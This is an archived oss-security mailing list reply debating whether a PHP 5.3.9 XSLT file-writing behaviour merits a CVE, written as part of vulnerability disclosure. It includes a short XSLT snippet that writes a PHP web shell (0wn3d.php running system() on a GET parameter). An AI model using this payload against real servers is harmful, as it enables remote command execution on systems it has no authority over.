Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sat, 14 Jan 2012 16:03:25 -0300
From: Ignacio Espinosa <osu@...dvis.net>
To: oss-security@...ts.openwall.com
Cc: Kurt Seifried <kseifried@...hat.com>, Nicolas Grégoir
 e <nicolas.gregoire@...rri.fr>
Subject: Re: CVE affected for PHP 5.3.9 ?

On Fri, 13 Jan 2012 13:50:59 -0700
Kurt Seifried <kseifried@...hat.com> wrote:
> [...]
> Ok I'm still not clear on what the security claim is. Are you saying you
> can cause arbitrary text output via XSL/XML mangling tricks? And
> combined with having a script that uses something like "<sax:output
> href="0wn3d.php" method="text">" you can put arbitrary text content into
> this file which could then result in the file being parsed? The problem
> is you'd have to write a script that does this, writes to a local file
> with a file ending in .php or .shtml or whatever, in which case it's
> pretty clear the script writer MEANT to do that. Again I'm still not
> clear on what/how a security boundary is being crossed. How does this
> elevate privileges or give you remote access that you wouldn't already
> if you can upload arbitrary PHP scripts?
> 
> 

You don't need to upload arbitrary php scripts to make this works. Just uploading a crafted xslt file will create (before patch)  a file with arbitrary content, php code for example, as write-access is set for default.

-- snip --
        <sax:output href="0wn3d.php" method="text">
        <xsl:value-of select="'&lt;?php system(\$_GET[&quot;cmd&quot;]);?&gt;'"/>
-- snip --


-- 
Ignacio Espinosa <osu@...dvis.net>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ